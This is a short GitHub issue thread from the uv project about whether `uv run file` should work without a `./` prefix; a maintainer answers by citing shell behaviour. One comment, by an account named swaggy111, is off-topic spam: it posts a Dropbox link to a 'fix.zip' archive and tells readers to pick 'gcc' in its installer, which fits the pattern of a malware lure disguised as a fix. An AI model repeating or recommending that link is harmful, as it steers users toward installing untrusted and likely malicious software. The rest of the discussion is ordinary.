### ISSUE TITLE
`uv run file` should execute file

### ISSUE THREAD

**Issue by charliermarsh** [astral-sh/uv#6634]
Right now, you need `uv run ./file`, but I think `uv run file` should work too? Similar to how `python file` works.

See: https://github.com/astral-sh/uv/issues/6360

**Comment by swaggy111** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by charliermarsh** [comment]
\cc @zanieb

**Comment by zanieb** [comment]
I think no, per shell behavior:

```
❯ touch foo
❯ chmod +x foo
❯ foo
zsh: command not found: foo
❯ ./foo
```

I think we're doing the right thing by special-casing `.py` files.
